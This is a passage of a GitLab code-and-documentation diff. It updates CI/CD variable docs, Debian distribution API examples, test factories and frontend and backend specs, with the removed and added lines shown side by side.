- job: build-job1
artifacts: true
environment:
name: customer4
deployment_tier: production
deploy_five:
test-job5:
stage: test
script:
- echo "$BUILD_VERSION" # Output is empty
- echo "$BUILD_VERSION" # Output is ''
needs:
- job: build
- job: build-job1
artifacts: false
environment:
name: customer5
deployment_tier: production
```
[Multi-project pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job)
can also inherit variables from their upstream pipelines.
test-job6:
stage: test
script:
- echo "$BUILD_VERSION" # Output is ''
needs:
- build-job2
```
### Store multiple values in one variable
You cannot create a CI/CD variable that is an array of values, but you
can use shell scripting techniques for similar behavior.
For example, you can store multiple variables separated by a space in a variable,
For example, you can store multiple values separated by a space in a variable,
then loop through the values with a script:
```yaml
@ -552,7 +600,8 @@ job:
### Use the `$` character in CI/CD variables
If you do not want the `$` character interpreted as the start of a variable, use `$$` instead:
If you do not want the `$` character interpreted as the start of another variable,
use `$$` instead:
```yaml
job:
@ -568,9 +617,14 @@ job:
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217309) in GitLab 15.7.
Expanded variables treat values with the `$` character as a reference to another variable.
CI/CD variables are expanded by default.
CI/CD variables are expanded by default. To treat variables with a `$` character as raw strings,
disable variable expansion for the variable
To treat variables with a `$` character as raw strings, disable variable expansion for the variable:
Prerequisite:
- You must have the same role or access level as required to [define a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).
To disable variable expansion for the variable:
1. In the project or group, go to **Settings > CI/CD**.
1. Expand the **Variables** section.
@ -586,10 +640,10 @@ which variables take precedence.
The order of precedence for variables is (from highest to lowest):
1. These all have the same (highest) precedence:
1. These variables all have the same (highest) precedence:
- [Trigger variables](../triggers/index.md#pass-cicd-variables-in-the-api-call).
- [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule).
- [Manual pipeline run variables](#override-a-variable-when-running-a-pipeline-manually).
- [Manual pipeline run variables](../pipelines/index.md#run-a-pipeline-manually).
- Variables added when [creating a pipeline with the API](../../api/pipelines.md#create-a-new-pipeline).
1. Project [variables](#for-a-project).
1. Group [variables](#for-a-group). If the same variable name exists in a
@ -597,14 +651,13 @@ The order of precedence for variables is (from highest to lowest):
you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in
`Subgroup 2` takes precedence.
1. Instance [variables](#for-an-instance).
1. [Inherited variables](#pass-an-environment-variable-to-another-job).
1. [Variables from `dotenv` reports](#pass-an-environment-variable-to-another-job).
1. Variables defined in jobs in the `.gitlab-ci.yml` file.
1. Variables defined outside of jobs (globally) in the `.gitlab-ci.yml` file.
1. [Deployment variables](predefined_variables.md#deployment-variables).
1. [Predefined variables](predefined_variables.md).
In the following example, when the script in `job1` executes, the value of `API_TOKEN` is `secure`.
Variables defined in jobs have a higher precedence than variables defined globally.
For example:
```yaml
variables:
@ -614,50 +667,40 @@ job1:
variables:
API_TOKEN: "secure"
script:
- echo "The variable value is $API_TOKEN"
- echo "The variable is '$API_TOKEN'"
```
In this example, `job1` outputs `The variable is 'secure'` because variables defined in jobs
have higher precedence than variables defined globally.
### Override a defined CI/CD variable
You can override the value of a variable when you:
1. [Run a pipeline manually](#override-a-variable-when-running-a-pipeline-manually) in the UI.
1. Create a pipeline by using [the API](../../api/pipelines.md#create-a-new-pipeline).
1. Run a job manually in the UI.
1. Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd).
1. Trigger a pipeline by using [the API](../triggers/index.md#pass-cicd-variables-in-the-api-call).
1. Pass variables to a downstream pipeline [by using the `variable` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline)
or [by using variable inheritance](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).
- [Run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually) in the UI.
- Create a pipeline by using [the `pipelines` API endpoint](../../api/pipelines.md#create-a-new-pipeline).
- Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd).
- Trigger a pipeline by using [the `triggers` API endpoint](../triggers/index.md#pass-cicd-variables-in-the-api-call).
- Pass variables to a downstream pipeline [by using the `variable` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline)
or [by using `dotenv` variables](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).
The pipeline variables declared in these events take [priority over other variables](#cicd-variable-precedence).
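For example, with push options, a variable can be set for the pipeline created by a single push. A minimal sketch, assuming a hypothetical variable named `DEPLOY_ENV` and a `main` branch:

```shell
# Override DEPLOY_ENV for the pipeline created by this push only
git push -o ci.variable="DEPLOY_ENV=staging" origin main
```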
NOTE:
You should avoid overriding [predefined variables](predefined_variables.md),
as it can cause the pipeline to behave unexpectedly.
### Override a variable when running a pipeline manually
You can override the value of a CI/CD variable when you
[run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually).
1. Go to your project's **CI/CD > Pipelines** and select **Run pipeline**.
1. Choose the branch you want to run the pipeline for.
1. Input the variable and its value in the UI.
You should avoid overriding [predefined variables](predefined_variables.md), as it
can cause the pipeline to behave unexpectedly.
### Restrict who can override variables
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/295234) in GitLab 13.8.
You can grant permission to override variables to users with the Maintainer role only. When other users try to run a pipeline
with overridden variables, they receive the `Insufficient permissions to set pipeline variables`
error message.
You can limit the ability to override variables to only users with the Maintainer role.
When other users try to run a pipeline with overridden variables, they receive the
`Insufficient permissions to set pipeline variables` error message.
Enable this feature by using [the projects API](../../api/projects.md#edit-project)
to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default.
If you [store your CI/CD configurations in a different repository](../../ci/pipelines/settings.md#specify-a-custom-cicd-configuration-file),
use this setting for control over the environment the pipeline runs in.
You can enable this feature by using [the projects API](../../api/projects.md#edit-project)
to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default.
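For example, a minimal sketch using `curl`, with a placeholder access token and project ID:

```shell
# Restrict pipeline variable overrides to users with at least the Maintainer role
curl --request PUT \
  --header "PRIVATE-TOKEN: <your_access_token>" \
  "https://gitlab.example.com/api/v4/projects/<project_id>?restrict_user_defined_variables=true"
```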
## Related topics
- You can configure [Auto DevOps](../../topics/autodevops/index.md) to pass CI/CD variables
@ -683,13 +726,12 @@ in Bash or `dir env:` in PowerShell. This exposes the values of **all** available
variables, which can be a [security risk](#cicd-variable-security).
[Masked variables](#mask-a-cicd-variable) display as `[masked]`.
For example:
For example, with Bash:
```yaml
job_name:
script:
- export
# - 'dir env:' # Use this for PowerShell
```
Example job log output (truncated):
@ -733,7 +775,7 @@ Before you enable debug logging, make sure only team members
can view job logs. You should also [delete job logs](../jobs/index.md#view-jobs-in-a-pipeline)
with debug output before you make logs public again.
To enable debug logging (tracing), set the `CI_DEBUG_TRACE` variable to `true`:
To enable debug logging, set the `CI_DEBUG_TRACE` variable to `true`:
```yaml
job_name:

View File

@ -304,7 +304,7 @@ In GitLab 14.5 and later, you can also use:
- [Trigger variables](../triggers/index.md#pass-cicd-variables-in-the-api-call).
- [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule).
- [Manual pipeline run variables](../variables/index.md#override-a-variable-when-running-a-pipeline-manually).
- [Manual pipeline run variables](../pipelines/index.md#run-a-pipeline-manually).
- Pipeline [predefined variables](../variables/predefined_variables.md).
YAML files are parsed before the pipeline is created, so the following pipeline predefined variables

View File

@ -32,6 +32,8 @@ The `review-docs-deploy*` job triggers a cross project pipeline and builds the
docs site with your changes. When the pipeline finishes, the review app URL
appears in the merge request widget. Use it to navigate to your changes.
The `review-docs-cleanup` job is triggered automatically on merge. This job deletes the review app.
You must have the Developer role in the project. Users without the Developer role, such
as external contributors, cannot run the manual job. In that case, ask someone from
the GitLab team to run the job.

View File

@ -37,7 +37,7 @@ You can also [switch to an existing branch](start-using-git.md#switch-to-a-branc
if you have one already.
Using your standard tool for copying files (for example, Finder in macOS, or File Explorer
on Windows), put the file into a directory within the GitLab project.
on Windows), put the file into a directory in the GitLab project.
Check if your file is actually present in the directory (if you're on Windows,
use `dir` instead):

View File

@ -32,7 +32,5 @@ disqus_identifier: 'https://docs.gitlab.com/ee/workflow/workflow.html'
```
1. Review your code on commits page.
1. Create a merge request.
1. Your team lead reviews the code and merges it to the main branch.

View File

@ -82,12 +82,12 @@ To create a project-level distribution:
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/<project_id>/debian_distributions?codename=<codename>"
```
Example response with `codename=unstable`:
Example response with `codename=sid`:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,

View File

@ -95,6 +95,20 @@ in the `.gitlab/product_analytics/dashboards/` directory of a project repository
Project maintainers can control changes to dashboards by using features such as code owners and approval rules. Dashboards are versioned in source control with the rest of a project's code.
### View project dashboards
> Introduced in GitLab 15.9 behind the [feature flag](../../administration/feature_flags.md) named `combined_analytics_dashboards`. Disabled by default.
FLAG:
On self-managed GitLab, by default this feature is not available. To make it available per project or for your entire instance, ask an administrator to [enable the feature flag](../../administration/feature_flags.md) named `combined_analytics_dashboards`.
On GitLab.com, this feature is not available.
This feature is not ready for production use.
To view a list of product analytics dashboards for a project:
1. On the top bar, select **Main menu > Projects** and find your project.
1. On the left sidebar, select **Analytics > Dashboards**.
### Define a dashboard
To define a dashboard:

View File

@ -67,6 +67,42 @@ If a user is:
- A direct member of a project, the **Expiration** and **Max role** fields can be updated directly on the project.
- An inherited member from a parent group, the **Expiration** and **Max role** fields must be updated on the parent group.
### Membership and visibility rights
Depending on their membership type, members of groups or projects are granted different visibility levels
and rights in the group or project.
| Action | Direct group member | Inherited group member | Direct shared group member | Inherited shared group member |
| --- | ------------------- | ---------------------- | -------------------------- | ----------------------------- |
| Generate boards | ✓ | ✓ | ✓ | ✓ |
| View issues of groups higher in the hierarchy | ✓ | ✓ | ✓ | ✓ |
| View labels of groups higher in the hierarchy | ✓ | ✓ | ✓ | ✓ |
| View milestones of groups higher in the hierarchy | ✓ | ✓ | ✓ | ✓ |
| Be shared into other groups | ✓ | | | |
| Be shared into other projects | ✓ | ✓ | | |
| Share the group with other members | ✓ | | | |
In the following example, `User` is a:
- Direct member of `subgroup`.
- Inherited member of `subsubgroup`.
- Indirect member of `subgroup-2` and `subgroup-3`.
- Indirect inherited member of `subsubgroup-2` and `subsubgroup-3`.
```mermaid
graph TD
classDef user stroke:green,color:green;
root --> subgroup --> subsubgroup
root-2 --> subgroup-2 --> subsubgroup-2
root-3 --> subgroup-3 --> subsubgroup-3
subgroup -. shared .-> subgroup-2 -. shared .-> subgroup-3
User-. member .- subgroup
class User user
```
## Add users to a project
> - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/247208) in GitLab 13.11 from a form to a modal window [with a flag](../../feature_flags.md). Disabled by default.

View File

@ -76,7 +76,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
post '/' do
@ -107,7 +107,7 @@ module API
params do
use :pagination
optional :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
optional :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
get '/' do
@ -132,7 +132,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
end
get '/:codename' do
authorize_read_package!(project_or_group)
@ -153,7 +153,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
end
get '/:codename/key.asc' do
authorize_read_package!(project_or_group)
@ -179,7 +179,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
put '/:codename' do
@ -210,7 +210,7 @@ module API
end
params do
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'unstable' }
requires :codename, type: String, regexp: Gitlab::Regex.debian_distribution_regex, desc: 'The Debian Codename', documentation: { example: 'sid' }
use :optional_distribution_params
end
delete '/:codename' do

View File

@ -6,7 +6,7 @@ module API
module Debian
class Distribution < Grape::Entity
expose :id, documentation: { type: 'integer', example: 1 }
expose :codename, documentation: { type: 'string', example: 'unstable' }
expose :codename, documentation: { type: 'string', example: 'sid' }
expose :suite, documentation: { type: 'string', example: 'unstable' }
expose :origin, documentation: { type: 'string', example: 'Grep' }
expose :label, documentation: { type: 'string', example: 'grep.be' }

View File

@ -36,6 +36,7 @@ RSpec.describe Projects::CommitController do
go(id: commit.id)
expect(response).to be_ok
expect(assigns(:ref)).to eq commit.id
end
context 'when a pipeline job is running' do
@ -57,6 +58,7 @@ RSpec.describe Projects::CommitController do
go(id: commit.id.reverse)
expect(response).to be_not_found
expect(assigns(:ref)).to be_nil
end
end

View File

@ -4,22 +4,24 @@ FactoryBot.define do
factory :debian_project_distribution, class: 'Packages::Debian::ProjectDistribution' do
container { association(:project) }
sequence(:codename) { |n| "project-dist-#{n}" }
sequence(:codename) { |n| "#{FFaker::Lorem.word}#{n}" }
factory :debian_group_distribution, class: 'Packages::Debian::GroupDistribution' do
container { association(:group) }
end
sequence(:codename) { |n| "group-dist-#{n}" }
trait(:with_suite) do
sequence(:suite) { |n| "#{FFaker::Lorem.word}#{n}" }
end
trait(:with_file) do
file_signature do
<<~EOF
<<~FILESIGNATURE
-----BEGIN PGP SIGNATURE-----
ABC
-----BEGIN PGP SIGNATURE-----
EOF
FILESIGNATURE
end
after(:build) do |distribution, evaluator|

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_group_architecture, class: 'Packages::Debian::GroupArchitecture' do
distribution { association(:debian_group_distribution) }
sequence(:name) { |n| "group-arch-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_group_component, class: 'Packages::Debian::GroupComponent' do
distribution { association(:debian_group_distribution) }
sequence(:name) { |n| "group-component-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_project_architecture, class: 'Packages::Debian::ProjectArchitecture' do
distribution { association(:debian_project_distribution) }
sequence(:name) { |n| "project-arch-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -4,6 +4,6 @@ FactoryBot.define do
factory :debian_project_component, class: 'Packages::Debian::ProjectComponent' do
distribution { association(:debian_project_distribution) }
sequence(:name) { |n| "project-component-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
end
end

View File

@ -66,7 +66,7 @@ FactoryBot.define do
end
factory :debian_package do
sequence(:name) { |n| "package-#{n}" }
sequence(:name) { |n| "#{FFaker::Lorem.word}#{n}" }
sequence(:version) { |n| "1.0-#{n}" }
package_type { :debian }

View File

@ -961,8 +961,8 @@ RSpec.describe 'File blob', :js, feature_category: :projects do
end
it 'renders sandboxed iframe' do
expected = %(<iframe src="/-/sandbox/swagger" sandbox="allow-scripts allow-popups allow-forms" frameborder="0" width="100%" height="1000">)
expect(page.html).to include(expected)
expected = %(iframe[src$="/-/sandbox/swagger"][sandbox="allow-scripts allow-popups allow-forms"][frameborder="0"][width="100%"][height="1000"])
expect(page).to have_css(expected)
end
end
end

View File

@ -1,5 +1,6 @@
import axios from 'axios';
import MockAdapter from 'axios-mock-adapter';
import { TEST_HOST } from 'helpers/test_constants';
import { setHTMLFixture, resetHTMLFixture } from 'helpers/fixtures';
import renderOpenApi from '~/blob/openapi';
import { HTTP_STATUS_OK } from '~/lib/utils/http_status';
@ -22,7 +23,7 @@ describe('OpenAPI blob viewer', () => {
it('initializes SwaggerUI with the correct configuration', () => {
expect(document.body.innerHTML).toContain(
'<iframe src="/-/sandbox/swagger" sandbox="allow-scripts allow-popups allow-forms" frameborder="0" width="100%" height="1000"></iframe>',
`<iframe src="${TEST_HOST}/-/sandbox/swagger" sandbox="allow-scripts allow-popups allow-forms" frameborder="0" width="100%" height="1000"></iframe>`,
);
});
});

View File

@ -12,7 +12,11 @@ describe('SignInPage', () => {
const findSignInGitlabCom = () => wrapper.findComponent(SignInGitlabCom);
const findSignInGitabMultiversion = () => wrapper.findComponent(SignInGitlabMultiversion);
const createComponent = ({ props = {}, jiraConnectOauthEnabled } = {}) => {
const createComponent = ({
props = {},
jiraConnectOauthEnabled,
publicKeyStorageEnabled,
} = {}) => {
store = createStore();
wrapper = shallowMount(SignInPage, {
@ -22,7 +26,11 @@ describe('SignInPage', () => {
jiraConnectOauth: jiraConnectOauthEnabled,
},
},
propsData: { hasSubscriptions: false, ...props },
propsData: {
hasSubscriptions: false,
publicKeyStorageEnabled,
...props,
},
});
};
@ -31,15 +39,20 @@ describe('SignInPage', () => {
});
it.each`
jiraConnectOauthEnabled | shouldRenderDotCom | shouldRenderMultiversion
${false} | ${true} | ${false}
${false} | ${true} | ${false}
${true} | ${false} | ${true}
${true} | ${false} | ${true}
jiraConnectOauthEnabled | publicKeyStorageEnabled | shouldRenderDotCom | shouldRenderMultiversion
${false} | ${true} | ${true} | ${false}
${false} | ${false} | ${true} | ${false}
${true} | ${true} | ${false} | ${true}
${true} | ${false} | ${true} | ${false}
`(
'renders correct component when jiraConnectOauth is $jiraConnectOauthEnabled',
({ jiraConnectOauthEnabled, shouldRenderDotCom, shouldRenderMultiversion }) => {
createComponent({ jiraConnectOauthEnabled });
({
jiraConnectOauthEnabled,
publicKeyStorageEnabled,
shouldRenderDotCom,
shouldRenderMultiversion,
}) => {
createComponent({ jiraConnectOauthEnabled, publicKeyStorageEnabled });
expect(findSignInGitlabCom().exists()).toBe(shouldRenderDotCom);
expect(findSignInGitabMultiversion().exists()).toBe(shouldRenderMultiversion);

View File

@ -1,23 +1,21 @@
import Vue from 'vue';
import VueApollo from 'vue-apollo';
import * as util from '~/lib/utils/url_utility';
import { shallowMountExtended } from 'helpers/vue_test_utils_helper';
import createMockApollo from 'helpers/mock_apollo_helper';
import waitForPromises from 'helpers/wait_for_promises';
import { shallowMountExtended } from 'helpers/vue_test_utils_helper';
import RuleView from '~/projects/settings/branch_rules/components/view/index.vue';
import Protection from '~/projects/settings/branch_rules/components/view/protection.vue';
import {
I18N,
ALL_BRANCHES_WILDCARD,
} from '~/projects/settings/branch_rules/components/view/constants';
import Protection from '~/projects/settings/branch_rules/components/view/protection.vue';
import branchRulesQuery from '~/projects/settings/branch_rules/queries/branch_rules_details.query.graphql';
import branchRulesQuery from 'ee_else_ce/projects/settings/branch_rules/queries/branch_rules_details.query.graphql';
import { sprintf } from '~/locale';
import {
branchProtectionsMockResponse,
approvalRulesMock,
statusChecksRulesMock,
matchingBranchesCount,
} from './mock_data';
} from 'ee_else_ce_jest/projects/settings/branch_rules/components/view/mock_data';
jest.mock('~/lib/utils/url_utility', () => ({
getParameterByName: jest.fn().mockReturnValue('main'),
@ -29,18 +27,18 @@ Vue.use(VueApollo);
const protectionMockProps = {
headerLinkHref: 'protected/branches',
headerLinkTitle: 'Manage in protected branches',
roles: [{ accessLevelDescription: 'Maintainers' }],
users: [{ avatarUrl: 'test.com/user.png', name: 'peter', webUrl: 'test.com' }],
headerLinkTitle: I18N.manageProtectionsLinkTitle,
};
const roles = [
{ accessLevelDescription: 'Maintainers' },
{ accessLevelDescription: 'Maintainers + Developers' },
];
describe('View branch rules', () => {
let wrapper;
let fakeApollo;
const projectPath = 'test/testing';
const protectedBranchesPath = 'protected/branches';
const approvalRulesPath = 'approval/rules';
const statusChecksPath = 'status/checks';
const branchProtectionsMockRequestHandler = jest
.fn()
.mockResolvedValue(branchProtectionsMockResponse);
@ -50,7 +48,8 @@ describe('View branch rules', () => {
wrapper = shallowMountExtended(RuleView, {
apolloProvider: fakeApollo,
provide: { projectPath, protectedBranchesPath, approvalRulesPath, statusChecksPath },
provide: { projectPath, protectedBranchesPath },
stubs: { Protection },
});
await waitForPromises();
@ -106,41 +105,53 @@ describe('View branch rules', () => {
it('renders a branch protection component for push rules', () => {
expect(findBranchProtections().at(0).props()).toMatchObject({
header: sprintf(I18N.allowedToPushHeader, { total: 2 }),
header: sprintf(I18N.allowedToPushHeader, {
total: 2,
}),
...protectionMockProps,
});
});
it('passes expected roles for push rules via props', () => {
findBranchProtections()
.at(0)
.props()
.roles.forEach((role, i) => {
expect(role).toMatchObject({
accessLevelDescription: roles[i].accessLevelDescription,
});
});
});
it('renders force push protection', () => {
expect(findForcePushTitle().exists()).toBe(true);
});
it('renders a branch protection component for merge rules', () => {
expect(findBranchProtections().at(1).props()).toMatchObject({
header: sprintf(I18N.allowedToMergeHeader, { total: 2 }),
header: sprintf(I18N.allowedToMergeHeader, {
total: 2,
}),
...protectionMockProps,
});
});
it('renders a branch protection component for approvals', () => {
expect(findApprovalsTitle().exists()).toBe(true);
expect(findBranchProtections().at(2).props()).toMatchObject({
header: sprintf(I18N.approvalsHeader, { total: 3 }),
headerLinkHref: approvalRulesPath,
headerLinkTitle: I18N.manageApprovalsLinkTitle,
approvals: approvalRulesMock,
});
it('passes expected roles for merge rules via props', () => {
findBranchProtections()
.at(1)
.props()
.roles.forEach((role, i) => {
expect(role).toMatchObject({
accessLevelDescription: roles[i].accessLevelDescription,
});
});
});
it('renders a branch protection component for status checks', () => {
expect(findStatusChecksTitle().exists()).toBe(true);
it('does not render a branch protection component for approvals', () => {
expect(findApprovalsTitle().exists()).toBe(false);
});
expect(findBranchProtections().at(3).props()).toMatchObject({
header: sprintf(I18N.statusChecksHeader, { total: 2 }),
headerLinkHref: statusChecksPath,
headerLinkTitle: I18N.statusChecksLinkTitle,
statusChecks: statusChecksRulesMock,
});
it('does not render a branch protection component for status checks', () => {
expect(findStatusChecksTitle().exists()).toBe(false);
});
});

View File

@ -85,16 +85,8 @@ export const accessLevelsMockResponse = [
__typename: 'PushAccessLevelEdge',
node: {
__typename: 'PushAccessLevel',
accessLevel: 40,
accessLevelDescription: 'Jona Langworth',
group: null,
user: {
__typename: 'UserCore',
id: '123',
webUrl: 'test.com',
name: 'peter',
avatarUrl: 'test.com/user.png',
},
accessLevel: 30,
accessLevelDescription: 'Maintainers',
},
},
{
@ -102,9 +94,7 @@ export const accessLevelsMockResponse = [
node: {
__typename: 'PushAccessLevel',
accessLevel: 40,
accessLevelDescription: 'Maintainers',
group: null,
user: null,
accessLevelDescription: 'Maintainers + Developers',
},
},
];
@ -122,10 +112,10 @@ export const branchProtectionsMockResponse = {
{
__typename: 'BranchRule',
name: 'main',
matchingBranchesCount,
branchProtection: {
__typename: 'BranchProtection',
allowForcePush: true,
codeOwnerApprovalRequired: true,
mergeAccessLevels: {
__typename: 'MergeAccessLevelConnection',
edges: accessLevelsMockResponse,
@ -135,41 +125,23 @@ export const branchProtectionsMockResponse = {
edges: accessLevelsMockResponse,
},
},
approvalRules: {
__typename: 'ApprovalProjectRuleConnection',
nodes: approvalRulesMock,
},
externalStatusChecks: {
__typename: 'ExternalStatusCheckConnection',
nodes: statusChecksRulesMock,
},
matchingBranchesCount,
},
{
__typename: 'BranchRule',
name: '*',
matchingBranchesCount,
branchProtection: {
__typename: 'BranchProtection',
allowForcePush: true,
codeOwnerApprovalRequired: true,
mergeAccessLevels: {
__typename: 'MergeAccessLevelConnection',
edges: [],
edges: accessLevelsMockResponse,
},
pushAccessLevels: {
__typename: 'PushAccessLevelConnection',
edges: [],
edges: accessLevelsMockResponse,
},
},
approvalRules: {
__typename: 'ApprovalProjectRuleConnection',
nodes: [],
},
externalStatusChecks: {
__typename: 'ExternalStatusCheckConnection',
nodes: [],
},
matchingBranchesCount,
},
],
},

View File

@ -47,11 +47,7 @@ export const pushAccessLevelsMockResult = {
groups: [],
roles: [
{
__typename: 'PushAccessLevel',
accessLevel: 40,
accessLevelDescription: 'Maintainers',
group: null,
user: null,
},
],
};

View File

@ -11,6 +11,7 @@ RSpec.describe GitlabSchema.types['WorkItem'] do
it 'has specific fields' do
fields = %i[
author
confidential
description
description_html

View File

@ -9,6 +9,7 @@ RSpec.describe JiraConnectHelper, feature_category: :integrations do
let(:user) { create(:user) }
let(:client_id) { '123' }
let(:enable_public_keys_storage) { false }
before do
stub_application_setting(jira_connect_application_key: client_id)
@ -19,7 +20,8 @@ RSpec.describe JiraConnectHelper, feature_category: :integrations do
context 'user is not logged in' do
before do
allow(view).to receive(:current_user).and_return(nil)
allow(Gitlab).to receive_message_chain('config.gitlab.url') { 'http://test.host' }
allow(Gitlab.config.gitlab).to receive(:url).and_return('http://test.host')
allow(Gitlab.config.jira_connect).to receive(:enable_public_keys_storage).and_return(enable_public_keys_storage)
end
it 'includes Jira Connect app attributes' do
@ -98,6 +100,18 @@ RSpec.describe JiraConnectHelper, feature_category: :integrations do
it 'assigns gitlab_user_path to nil' do
expect(subject[:gitlab_user_path]).to be_nil
end
it 'assigns public_key_storage_enabled to false' do
expect(subject[:public_key_storage_enabled]).to eq(false)
end
context 'when public_key_storage is enabled' do
let(:enable_public_keys_storage) { true }
it 'assigns public_key_storage_enabled to true' do
expect(subject[:public_key_storage_enabled]).to eq(true)
end
end
end
context 'user is logged in' do

View File

@ -2,16 +2,16 @@
require 'spec_helper'
RSpec.describe '5-Minute-Production-App.gitlab-ci.yml' do
RSpec.describe '5-Minute-Production-App.gitlab-ci.yml', feature_category: :five_minute_production_app do
subject(:template) { Gitlab::Template::GitlabCiYmlTemplate.find('5-Minute-Production-App') }
describe 'the created pipeline' do
let_it_be(:project) { create(:project, :auto_devops, :custom_repo, files: { 'README.md' => '' }) }
let_it_be_with_refind(:project) { create(:project, :auto_devops, :custom_repo, files: { 'README.md' => '' }) }
let(:user) { project.first_owner }
let(:default_branch) { 'master' }
let(:pipeline_branch) { default_branch }
let(:service) { Ci::CreatePipelineService.new(project, user, ref: pipeline_branch ) }
let(:service) { Ci::CreatePipelineService.new(project, user, ref: pipeline_branch) }
let(:pipeline) { service.execute(:push).payload }
let(:build_names) { pipeline.builds.pluck(:name) }
@ -24,24 +24,27 @@ RSpec.describe '5-Minute-Production-App.gitlab-ci.yml' do
end
context 'when AWS variables are set' do
def create_ci_variable(key, value)
create(:ci_variable, project: project, key: key, value: value)
end
before do
create(:ci_variable, project: project, key: 'AWS_ACCESS_KEY_ID', value: 'AKIAIOSFODNN7EXAMPLE')
create(:ci_variable, project: project, key: 'AWS_SECRET_ACCESS_KEY', value: 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY')
create(:ci_variable, project: project, key: 'AWS_DEFAULT_REGION', value: 'us-west-2')
create_ci_variable('AWS_ACCESS_KEY_ID', 'AKIAIOSFODNN7EXAMPLE')
create_ci_variable('AWS_SECRET_ACCESS_KEY', 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY')
create_ci_variable('AWS_DEFAULT_REGION', 'us-west-2')
end
it 'creates all jobs' do
expect(build_names).to match_array(%w(build terraform_apply deploy terraform_destroy))
expect(build_names).to match_array(%w[build terraform_apply deploy terraform_destroy])
end
context 'pipeline branch is protected' do
context 'when pipeline branch is protected' do
before do
create(:protected_branch, project: project, name: pipeline_branch)
project.reload
end
it 'does not create a destroy job' do
expect(build_names).to match_array(%w(build terraform_apply deploy))
expect(build_names).to match_array(%w[build terraform_apply deploy])
end
end
end

View File

@ -33,6 +33,26 @@ RSpec.describe Packages::Package, type: :model, feature_category: :package_regis
it { is_expected.to contain_exactly(publication.package) }
end
describe '.with_debian_codename_or_suite' do
let_it_be(:distribution1) { create(:debian_project_distribution, :with_suite) }
let_it_be(:distribution2) { create(:debian_project_distribution, :with_suite) }
let_it_be(:package1) { create(:debian_package, published_in: distribution1) }
let_it_be(:package2) { create(:debian_package, published_in: distribution2) }
context 'with a codename' do
subject { described_class.with_debian_codename_or_suite(distribution1.codename).to_a }
it { is_expected.to contain_exactly(package1) }
end
context 'with a suite' do
subject { described_class.with_debian_codename_or_suite(distribution2.suite).to_a }
it { is_expected.to contain_exactly(package2) }
end
end
describe '.with_composer_target' do
let!(:package1) { create(:composer_package, :with_metadatum, sha: '123') }
let!(:package2) { create(:composer_package, :with_metadatum, sha: '123') }

View File

@ -8,6 +8,7 @@ RSpec.describe 'getting a work item list for a project', feature_category: :team
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, :repository, :public, group: group) }
let_it_be(:current_user) { create(:user) }
let_it_be(:reporter) { create(:user).tap { |reporter| project.add_reporter(reporter) } }
let_it_be(:label1) { create(:label, project: project) }
let_it_be(:label2) { create(:label, project: project) }
let_it_be(:milestone1) { create(:milestone, project: project) }
@ -43,10 +44,10 @@ RSpec.describe 'getting a work item list for a project', feature_category: :team
end
shared_examples 'work items resolver without N + 1 queries' do
it 'avoids N+1 queries' do
it 'avoids N+1 queries', :use_sql_query_cache do
post_graphql(query, current_user: current_user) # warm-up
control = ActiveRecord::QueryRecorder.new do
control = ActiveRecord::QueryRecorder.new(skip_cached: false) do
post_graphql(query, current_user: current_user)
end
